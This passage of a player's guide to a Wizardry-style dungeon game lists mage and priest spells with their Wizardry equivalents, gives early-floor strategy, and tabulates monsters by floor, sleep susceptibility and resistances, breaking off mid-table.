^^^^^^^^^^|  |                                    |       |^^^^^^\n ^^^^^^^^^^|  |                                    |       |^^^^^^\n ^^^^^^^^^^|  |                                    |       |^^^^^^\n ^^^^^^^^^^| i)tems s)pells jk)change member l)leave > s   |^^^^^^\n\n\n<a id="org502fc72"></a>\n\n## Mage Spells\n\nOne of the most useful spells is the newly introduced "tsubasa". This spell takes the party to the upstairs of any floor depth the caster already knows. It can be used to get out of the dungeon (ie, choose depth=1) or to start an adventure from the deepest floor they have experienced.\n\n<table border="2" cellspacing="0" cellpadding="6" rules="groups" frame="hsides">\n\n\n<colgroup>\n<col class="org-right" />\n\n<col class="org-left" />\n\n<col class="org-left" />\n\n<col class="org-left" />\n</colgroup>\n<thead>\n<tr>\n<th scope="col" class="org-right">lv</th>\n<th scope="col" class="org-left">name</th>\n<th scope="col" class="org-left">wiz (FYI)</th>\n<th scope="col" class="org-left">description</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class="org-right">1</td>\n<td class="org-left">onibi</td>\n<td class="org-left">halito</td>\n<td class="org-left">Fireball to hit a monster for 1-8 damage. 鬼火</td>\n</tr>\n\n\n<tr>\n<td class="org-right">1</td>\n<td class="org-left">tate</td>\n<td class="org-left">mogref</td>\n<td class="org-left">Reduce the caster's AC by 2. 盾</td>\n</tr>\n\n\n<tr>\n<td class="org-right">1</td>\n<td class="org-left">shunmin</td>\n<td class="org-left">katino</td>\n<td class="org-left">Put one enemy group to sleep. 
春眠</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">gps</td>\n<td class=\"org-left\">(dumapic)</td>\n<td class=\"org-left\">Locate the precise position in the dungeon</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">kurayami</td>\n<td class=\"org-left\">dilto</td>\n<td class=\"org-left\">Increase AC by 2 for an enemy group. 暗闇</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">tomei</td>\n<td class=\"org-left\">sopic</td>\n<td class=\"org-left\">Reduce the caster's AC by 4. 透明</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">tsubasa</td>\n<td class=\"org-left\">(malor)</td>\n<td class=\"org-left\">Teleport to a known floor. 翼</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">taika</td>\n<td class=\"org-left\">mahalito</td>\n<td class=\"org-left\">Wall of fire to hit a group of enemies for 4-24 damage. 大火</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">kamaitachi</td>\n<td class=\"org-left\">molito</td>\n<td class=\"org-left\">Sharp wind to inflict 3-18 damage to an enemy group. 鎌鼬</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">4</td>\n<td class=\"org-left\">kanashibari</td>\n<td class=\"org-left\">morlis</td>\n<td class=\"org-left\">Increase AC by 4 for an enemy group. 金縛</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">4</td>\n<td class=\"org-left\">toketsu</td>\n<td class=\"org-left\">dalto</td>\n<td class=\"org-left\">Blizzard to inflict 6-36 damage to an enemy group. 凍結</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">4</td>\n<td class=\"org-left\">gouka</td>\n<td class=\"org-left\">lahalito</td>\n<td class=\"org-left\">Big fire to inflict 6-36 damage to an enemy group. 業火</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">5</td>\n<td class=\"org-left\">kyofu</td>\n<td class=\"org-left\">mamorlis</td>\n<td class=\"org-left\">Increase AC by 4 for all enemy groups. 恐怖</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">5</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">makanito</td>\n<td class=\"org-left\">Eliminate all enemies below Lvl 8. 殲滅</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">5</td>\n<td class=\"org-left\">zettaireido</td>\n<td class=\"org-left\">madalto</td>\n<td class=\"org-left\">Abs. zero to cause 8-64 damage to an enemy group. 絶対零度</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">6</td>\n<td class=\"org-left\">shinoroi</td>\n<td class=\"org-left\">lakanito</td>\n<td class=\"org-left\">Kill all air-breathing enemies in a group. 死呪</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">6</td>\n<td class=\"org-left\">butsumetsu</td>\n<td class=\"org-left\">zilwan</td>\n<td class=\"org-left\">Buddha power to inflict 10-2000 damage to an undead. 仏滅</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">6</td>\n<td class=\"org-left\">zentomei</td>\n<td class=\"org-left\">masopic</td>\n<td class=\"org-left\">Reduce party's AC by 4. 全透明</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">7</td>\n<td class=\"org-left\">jigokunohonou</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">Inferno to inflict 20-400 damage to a single enemy. 地獄の炎</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">7</td>\n<td class=\"org-left\">kakubaku</td>\n<td class=\"org-left\">tiltowait</td>\n<td class=\"org-left\">Nuclear fusion to inflict 10-150 damage to all enemies. 
核爆</td>\n</tr>\n</tbody>\n</table>\n\n\n<a id=\"org5e7606d\"></a>\n\n## Priest Spells\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-right\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-right\">lv</th>\n<th scope=\"col\" class=\"org-left\">name</th>\n<th scope=\"col\" class=\"org-left\">wiz (FYI)</th>\n<th scope=\"col\" class=\"org-left\">description</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">shukufuku</td>\n<td class=\"org-left\">kalki</td>\n<td class=\"org-left\">Reduce party's AC by 1. 祝福</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">jiai</td>\n<td class=\"org-left\">dios</td>\n<td class=\"org-left\">Restore 1-8 HP to a single target. 慈愛</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">ikari</td>\n<td class=\"org-left\">badios</td>\n<td class=\"org-left\">Angry power to inflict 1-8 damage to an enemy. 怒り</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">akari</td>\n<td class=\"org-left\">milwa</td>\n<td class=\"org-left\">A bright light lets you see further for a while. 灯り</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">mamori</td>\n<td class=\"org-left\">porfic</td>\n<td class=\"org-left\">Reduce the caster's AC by 4. 護り</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">kabe</td>\n<td class=\"org-left\">matu</td>\n<td class=\"org-left\">Reduce party's AC by 2. 壁</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">kantei</td>\n<td class=\"org-left\">calfo</td>\n<td class=\"org-left\">Identify a trap with 95% accuracy. 鑑定</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">nero</td>\n<td class=\"org-left\">manifo</td>\n<td class=\"org-left\">Paralyze a group of enemies. 寝ろ</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">damare</td>\n<td class=\"org-left\">montino</td>\n<td class=\"org-left\">Silence an enemy group. 黙れ</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">hikarinotama</td>\n<td class=\"org-left\">lomilwa</td>\n<td class=\"org-left\">A bright light lets you see further for a long time. 光の玉</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">okiro</td>\n<td class=\"org-left\">dialko</td>\n<td class=\"org-left\">Cures a paralyzed or asleep for a single target. 起きろ</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">shikibetsu</td>\n<td class=\"org-left\">latumapic</td>\n<td class=\"org-left\">Identify enemies. 識別</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">kaminohogo</td>\n<td class=\"org-left\">bamatu</td>\n<td class=\"org-left\">Reduce party's AC by 4. 神の保護</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">iyashi</td>\n<td class=\"org-left\">dial</td>\n<td class=\"org-left\">Restore 4-16 HP to a single target. 癒し</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">4</td>\n<td class=\"org-left\">gekido</td>\n<td class=\"org-left\">badial</td>\n<td class=\"org-left\">Infuriate power to inflict 2-16 damage to an enemy. 
激怒</td>\n</tr>\n\n\n<tr>\n<td class="org-right">4</td>\n<td class="org-left">gedoku</td>\n<td class="org-left">latumofis</td>\n<td class="org-left">Cure poison for a single target. 解毒</td>\n</tr>\n\n\n<tr>\n<td class="org-right">4</td>\n<td class="org-left">hogo</td>\n<td class="org-left">maporfic</td>\n<td class="org-left">Reduce party's AC by 2 while you are in the dungeon. 保護</td>\n</tr>\n\n\n<tr>\n<td class="org-right">4</td>\n<td class="org-left">zenjiai</td>\n<td class="org-left">-</td>\n<td class="org-left">Heal entire party by 1-8 HP. 全慈愛</td>\n</tr>\n\n\n<tr>\n<td class="org-right">5</td>\n<td class="org-left">daikaifuku</td>\n<td class="org-left">dialma</td>\n<td class="org-left">Restore 8-24 HP to a single target. 大回復</td>\n</tr>\n\n\n<tr>\n<td class="org-right">5</td>\n<td class="org-left">kaminoikari</td>\n<td class="org-left">litokan</td>\n<td class="org-left">God's fire inflicts 3-24 damage to an enemy group. 神の怒り</td>\n</tr>\n\n\n<tr>\n<td class="org-right">5</td>\n<td class="org-left">sosei</td>\n<td class="org-left">di</td>\n<td class="org-left">Attempt to resurrect a dead character. 蘇生</td>\n</tr>\n\n\n<tr>\n<td class="org-right">5</td>\n<td class="org-left">shisubeshi</td>\n<td class="org-left">badi</td>\n<td class="org-left">Attempt to kill an enemy. 死すべし</td>\n</tr>\n\n\n<tr>\n<td class="org-right">6</td>\n<td class="org-left">tenchu</td>\n<td class="org-left">lorto</td>\n<td class="org-left">God's power to inflict 6-36 damage to an enemy group. 天誅</td>\n</tr>\n\n\n<tr>\n<td class="org-right">6</td>\n<td class="org-left">kanzen</td>\n<td class="org-left">madi</td>\n<td class="org-left">Complete heal & cure. 完全</td>\n</tr>\n\n\n<tr>\n<td class="org-right">6</td>\n<td class="org-left">hinshi</td>\n<td class="org-left">mabadi</td>\n<td class="org-left">God's power to almost kill a single enemy. 瀕死</td>\n</tr>\n\n\n<tr>\n<td class="org-right">7</td>\n<td class="org-left">tenchihokai</td>\n<td class="org-left">malikto</td>\n<td class="org-left">A meteor strike inflicts 12-72 damage to all enemies. 天地崩壊</td>\n</tr>\n\n\n<tr>\n<td class="org-right">7</td>\n<td class="org-left">fukkatsu</td>\n<td class="org-left">kadorto</td>\n<td class="org-left">Attempt to resurrect even an ashed person. 復活</td>\n</tr>\n\n\n<tr>\n<td class="org-right">7</td>\n<td class="org-left">zenkai</td>\n<td class="org-left">-</td>\n<td class="org-left">8-24 HP group heal to party. 全快</td>\n</tr>\n</tbody>\n</table>\n\n\n<a id="orgad97807"></a>\n\n# Monsters\n\n\n<a id="org5a27944"></a>\n\n## Shallow floors\n\nAs most monster data comes from Wizardry (though with different names), it's not easy to defeat them. Even orc skeletons can deal devastating damage to your party. At first, use 'shunmin' against monsters. If 'shunmin' is exhausted, you should go back to the castle and take some rest to recover MP.\n\nGoblins are your first target monsters. If you reach level 2 or 3, you can target cops. Cops are the most powerful monsters on the first floor, and their e.p. is high.\n\nMonsters on the second floor are strong. You could even get poisoned or beheaded. Among them, coffee beans are bonus monsters. You can always run away from monsters that you don't want to fight against. 
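\n\nConceptually, each row of the monster tables below is one small record: the real name, the name shown before identification ('shikibetsu' reveals the real one), the floors it appears on, whether sleep works, and its resistances. A hypothetical sketch of such an entry (for illustration only):\n\n    # Hypothetical sketch: the shape of one monster table entry.\n    from dataclasses import dataclass\n\n    @dataclass\n    class MonsterEntry:\n        name: str            # e.g. 'blue slime'\n        unidentified: str    # e.g. 'slime', shown before identification\n        floors: tuple        # e.g. (1,)\n        sleepable: bool      # True if 'shunmin' can put it to sleep\n        resists: tuple = ()  # e.g. ('fire', 'cold')\n        comment: str = ''\n\n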
Just don't forget to save often.\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-left\">name</th>\n<th scope=\"col\" class=\"org-left\">unidentified</th>\n<th scope=\"col\" class=\"org-right\">flr</th>\n<th scope=\"col\" class=\"org-left\">slp</th>\n<th scope=\"col\" class=\"org-left\">regist</th>\n<th scope=\"col\" class=\"org-left\">Comment</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-left\">blue slime</td>\n<td class=\"org-left\">slime</td>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">The weakest monster in DL</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">orc</td>\n<td class=\"org-left\">small humanoid</td>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">fire</td>\n<td class=\"org-left\">Weak monster. Don't bother</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">goblin</td>\n<td class=\"org-left\">small humanoid</td>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">High e.p. Use 'shunmin'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">orc skeleton</td>\n<td class=\"org-left\">skeleton</td>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">fire,cold</td>\n<td class=\"org-left\">Low e.p. but a little strong</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">ripper</td>\n<td class=\"org-left\">scruffy man</td>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Average</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">cop</td>\n<td class=\"org-left\">man in uniform</td>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Most powerful. High e.p.</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">yakuza</td>\n<td class=\"org-left\">scary man</td>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">High e.p. 
but can behead</td>\n</tr>\n\n\n<tr>\n<td class="org-left">zombie</td>\n<td class="org-left">weird humanoid</td>\n<td class="org-right">2</td>\n<td class="org-left">-</td>\n<td class="org-left">&#xa0;</td>\n<td class="org-left">Could paralyze you</td>\n</tr>\n\n\n<tr>\n<td class="org-left">wild turkey</td>\n<td class="org-left">bird</td>\n<td class="org-right">2</td>\n<td class="org-left">yes</td>\n<td class="org-left">cold</td>\n<td class="org-left">Scary looking big bird</td>\n</tr>\n\n\n<tr>\n<td class="org-left">pink cloud</td>\n<td class="org-left">pink cloud</td>\n<td class="org-right">2</td>\n<td class="org-left">-</td>\n<td class="org-left">&#xa0;</td>\n<td class="org-left">Use mage spells and paralyze</td>\n</tr>\n\n\n<tr>\n<td class="org-left">lvl1 mage</td>\n<td class="org-left">man in robes</td>\n<td class="org-right">2</td>\n<td class="org-left">yes</td>\n<td class="org-left">&#xa0;</td>\n<td class="org-left">Be careful of "shunmin"</td>\n</tr>\n\n\n<tr>\n<td class="org-left">lvl1 priest</td>\n<td class="org-left">priest</td>\n<td class="org-right">2</td>\n<td class="org-left">yes</td>\n<td class="org-left">&#xa0;</td>\n<td class="org-left">Use priest lvl1 spells</td>\n</tr>\n\n\n<tr>\n<td class="org-left">coffee bean</td>\n<td class="org-left">dot</td>\n<td class="org-right">2</td>\n<td class="org-left">-</td>\n<td class="org-left">&#xa0;</td>\n<td class="org-left">Bonus monster. High e.p.</td>\n</tr>\n\n\n<tr>\n<td class="org-left">lvl1 ninja</td>\n<td class="org-left">black belt</td>\n<td class="org-right">2</td>\n<td class="org-left">yes</td>\n<td class="org-left">fire,cold</td>\n<td class="org-left">Could behead you</td>\n</tr>\n\n\n<tr>\n<td class="org-left">bobcat</td>\n<td class="org-left">cat</td>\n<td class="org-right">2,3</td>\n<td class="org-left">-</td>\n<td class="org-left">cold</td>\n<td class="org-left">Could behead you</td>\n</tr>\n\n\n<tr>\n<td class="org-left">killer mouse</td>\n<td class="org-left">giant rodent</td>\n<td class="org-right">3</td>\n<td class="org-left">-</td>\n<td class="org-left">&#xa0;</td>\n<td class="org-left">Could poison you</td>\n</tr>\n\n\n<tr>\n<td class="org-left">comodo dragon</td>\n<td class="org-left">lizard</td>\n<td class="org-right">3</td>\n<td class="org-left">-</td>\n<td class="org-left">fire</td>\n<td class="org-left">Could poison you. Good e.p.</td>\n</tr>\n\n\n<tr>\n<td class="org-left">hyena</td>\n<td class="org-left">mangy dog</td>\n<td class="org-right">3</td>\n<td class="org-left">-</td>\n<td class="org-left">&#xa0;</td>\n<td class="org-left">Not bad but a little strong</td>\n</tr>\n\n\n<tr>\n<td class="org-left">lvl3 priest</td>\n<td class="org-left">priest</td>\n<td class="org-right">3</td>\n<td class="org-left">yes</td>\n<td class="org-left">&#xa0;</td>\n<td class="org-left">Be careful of "damare"</td>\n</tr>\n\n\n<tr>\n<td class="org-left">lvl3 samurai</td>\n<td class="org-left">kimonoed man</td>\n<td class="org-right">3</td>\n<td class="org-left">-</td>\n<td class="org-left">&#xa0;</td>\n<td class="org-left">Be careful of "shunmin"</td>\n</tr>\n\n\n<tr>\n<td class="org-left">lvl3 ninja</td>\n<td class="org-left">kimonoed man</td>\n<td class="org-right">3,4</td>\n<td class="org-left">-</td>\n<td class="org-left">&#xa0;</td>\n<td class="org-left">High e.p. 
Critical & poison</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">were bear</td>\n<td class=\"org-left\">bear</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">cold</td>\n<td class=\"org-left\">High e.p. Poison and paraly</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">humming dragon</td>\n<td class=\"org-left\">tiny dragon</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">fire</td>\n<td class=\"org-left\">Fire breath</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">rotting corpose</td>\n<td class=\"org-left\">weird humanoid</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Paralyze</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">akaoni</td>\n<td class=\"org-left\">ogre</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Average or weak</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">huge spider</td>\n<td class=\"org-left\">insect</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Poison</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">wererbbit</td>\n<td class=\"org-left\">animal</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Weak</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">iron beetle</td>\n<td class=\"org-left\">insect</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Strong attack</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">green dragon</td>\n<td class=\"org-left\">dragon</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Breath and \"shunmin\"</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">priestess</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Often with green dragon</td>\n</tr>\n</tbody>\n</table>\n\n\n<a id=\"orgde7ee28\"></a>\n\n## Middle depth floors\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-left\">name</th>\n<th scope=\"col\" class=\"org-left\">unidentified</th>\n<th scope=\"col\" class=\"org-left\">flr</th>\n<th scope=\"col\" class=\"org-left\">slp</th>\n<th scope=\"col\" class=\"org-left\">regist</th>\n<th scope=\"col\" class=\"org-left\">Comment</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-left\">swordsman</td>\n<td class=\"org-left\">man in armor</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Attack only</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">killer hornet</td>\n<td class=\"org-left\">insect</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Poison</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">robot dog</td>\n<td class=\"org-left\">animal</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">yes</td>\n<td 
class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Robot dog could sleep</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">kokopelli</td>\n<td class=\"org-left\">kokopellis</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">spell</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">ghost</td>\n<td class=\"org-left\">thin figure</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">ice dragon</td>\n<td class=\"org-left\">dragon</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">Breath</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">python</td>\n<td class=\"org-left\">snake</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">half prince</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">Drain</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">bishop</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">honcho</td>\n<td class=\"org-left\">man in armor</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">magician</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">5,6</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl4 thief</td>\n<td class=\"org-left\">man in leather</td>\n<td class=\"org-left\">5,6</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">snow lerpard</td>\n<td class=\"org-left\">animal</td>\n<td class=\"org-left\">5,6</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">mononoke</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">5,6</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Poison</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">ancient spider</td>\n<td class=\"org-left\">insect</td>\n<td class=\"org-left\">5,6</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Poison</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">werewolf</td>\n<td class=\"org-left\">animal</td>\n<td class=\"org-left\">5,6,7</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Poison</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">medusa hair</td>\n<td class=\"org-left\">snake</td>\n<td class=\"org-left\">5,6,7</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Stone</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl5 priest</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-left\">5,6,7</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td 
class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl6 ninja</td>\n<td class=\"org-left\">man in black</td>\n<td class=\"org-left\">5,6,7</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">No critical</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl7 mage</td>\n<td class=\"org-left\">man in robe</td>\n<td class=\"org-left\">5,6,7</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">'gouka', 'toketsu'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">kasipian wind</td>\n<td class=\"org-left\">sailor</td>\n<td class=\"org-left\">6,7,8</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">tycoon</td>\n<td class=\"org-left\">man in armor</td>\n<td class=\"org-left\">6,7,8</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">high priest</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-left\">6,7,8</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">'shisubeshi'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">ronin</td>\n<td class=\"org-left\">man in kimono</td>\n<td class=\"org-left\">6,7,8</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">arch mage</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">6,7,8</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">'shunmin'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lupin the 3rd</td>\n<td class=\"org-left\">man in jacket</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">hell dog</td>\n<td class=\"org-left\">animal</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">aooni</td>\n<td class=\"org-left\">ogre</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">'taika'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">troll</td>\n<td class=\"org-left\">strange animal</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td 